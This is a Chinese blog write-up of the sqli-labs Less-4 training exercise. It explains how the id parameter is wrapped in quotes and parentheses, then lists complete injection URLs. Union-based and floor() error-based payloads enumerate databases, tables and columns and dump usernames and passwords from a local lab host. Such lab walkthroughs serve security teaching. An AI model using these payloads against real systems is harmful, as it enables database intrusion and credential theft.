经测试,发现单引号不报错,而双引号却报错了

通过查看源码,发现下图中红色的箭头,如果不知道是什么意思,我们可以复制出来看看是什么含义:

<?php
$id=1;
$id='"' .$id. '"';
echo $id;
?>
得知是给参数加上两个双引号,,

后面带入查询语句的时候 还加了()   ,所有我们的payload如下

一、 union 查询

查询字段:http://192.168.48.130/sqli-labs-master/Less-4/?id=1") order by 3--+

查询当前数据库:http://192.168.48.130/sqli-labs-master/Less-4/?id=z1") union select 1,database(),3--+



 查询所有数据库:http://192.168.48.130/sqli-labs-master/Less-4/?id=z1") union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+

查询security数据库下的所有表:http://192.168.48.130/sqli-labs-master/Less-4/?id=z1") union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479),3--+

查询users表下的所有字段:

http://192.168.48.130/sqli-labs-master/Less-4/?id=z1") union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273),3--+

查询username,password 的具体值:

http://192.168.48.130/sqli-labs-master/Less-4/?id=z1") union select 1,(select group_concat(username,0x3a,password) from users),3--+

二、floor报错注入

查询数据库  Limit  来控制:

http://192.168.48.130/sqli-labs-master/Less-4/?id=z1") and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

爆表 Limit控制:

http://192.168.48.130/sqli-labs-master/Less-4/?id=z1") and (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

爆字段:

http://192.168.48.130/sqli-labs-master/Less-4/?id=z1") and (select 1 from (select count(*),concat((select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

爆内容:

http://192.168.48.130/sqli-labs-master/Less-4/?id=z1") and (select 1 from (select count(*),concat((select username from users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

												


																

最新文章
	

    
						
  1. compositionEnd  和 input 事件(中文输入法问题)
		
    2. 
						
  2. List remove注意点
		
    3. 
						
  3. 【Android Demo】简单手机通讯录
		
    4. 
						
  4. Linux服务器使用命令操作MySQL插入数据乱码问题
		
    5. 
						
  5. 五分钟看懂js关键字this
		
    6. 
						
  6. yii2源码学习笔记(二)
		
    7. 
						
  7. IO通信
		
    8. 
						
  8. SWT入门-常用组件的使用(转)
		
    9. 
						
  9. Ecplise 中 加载JDBC 连接 Mysql 数据库读取数据
		
    10. 
						
  10. 使用Docker
		
    11. 
						
  11. vs2015数据驱动的单元测试
		
    12. 
						
  12. CentOS 7 下面使用 sendMail 发送邮件
		
    13. 
						
  13. Java知识回顾 (8) 集合
		
    14. 
						
  14. Asp.Net 自定义设置Http缓存示例(一)
		
    15. 
						
  15. 记录前台页面一些jQuery笔记
		
    16. 
						
  16. Ubuntu16.04中禁用UTC解决双系统时间问题
		
    17. 
						
  17. Django 模板语言  路由 视图
		
    18. 
						
  18. GPG key retrieval failed: [Errno 14] Could not open/read file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-
		
    19. 
						
  19. 使用 telnet 发邮件
		
    20. 
						
  20. Effective JavaScript Item 46 优先使用数组而不是Object类型来表示有顺序的集合
		
    21. 
		

	


热门文章
	

    
									
  1. 试玩 GOWOG ,初探 OpenAI(使用 NeuroEvolution 神经进化)与 Golang 多人在线游戏开发
			
    2. 
						
  2. H3C、Huawei、Cisco网络设备AAA TACACS认证配置
			
    3. 
						
  3. 【Soul源码探秘】插件链实现
			
    4. 
						
  4. 编译Nacos,解决No Server available 以及 failed to req API__nacos_v1_ns_instance after all servers
			
    5. 
						
  5. .NET 中依赖注入组件 Autofac 的性能漫聊
			
    6. 
						
  6. Update Node Using a Package Manager  nodesource
			
    7. 
						
  7. maven打包三种方式
			
    8. 
						
  8. UML 博客学习  后续继续完善
			
    9. 
						
  9. 向数据库添加100W 条数据  性能测试
			
    10. 
						
  10. Jenkins(2)docker容器中安装python3
			
    11.